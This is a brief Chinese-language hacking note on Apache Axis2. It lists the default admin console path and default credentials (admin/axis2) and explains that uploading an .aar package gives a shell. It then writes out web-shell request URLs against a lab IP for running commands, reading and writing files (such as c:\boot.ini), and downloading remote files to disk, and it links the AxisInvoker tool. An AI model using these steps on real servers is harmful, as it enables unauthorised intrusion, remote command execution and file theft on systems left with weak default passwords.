Axis2
Axis2是下一代 Apache Axis。Axis2 雖然由 Axis 1.x 處理程序模型提供支持,但它具有更強的靈活性並可擴展到新的體系結構。Axis2 基於新的體系結構進行了全新編寫,而且沒有采用 Axis 1.x 的常用代碼。支持開發 Axis2 的動力是探尋模塊化更強、靈活性更高和更有效的體系結構,這種體系結構可以很容易地插入到其他相關 Web 服務標准和協議(如 WS-Security、WS-ReliableMessaging 等)的實現中
默認后台:http://ip:port/axis2/axis2-admin/login
默認口令密碼
admin
axis2
一般這個密碼是沒人改的,碰到好多都是弱口令
進入到后台后,可以通過上傳一個aar的包直接getshell
-
aar包,使用方法
支持的命令?
exec-運行命令,在Linux / Windows上均可使用,不用擔心。
http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=dir%20C:
寫-寫文件
http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123
info-顯示某些信息,根據需要進行修改
http://192.168.56.103:8080/axis2/services/AxisInvoker/info
讀取-讀取文件內容
http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini
下載-下載文件並將其保存在某處
http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt
下載地址:https://github.com/CaledoniaProject/AxisInvoker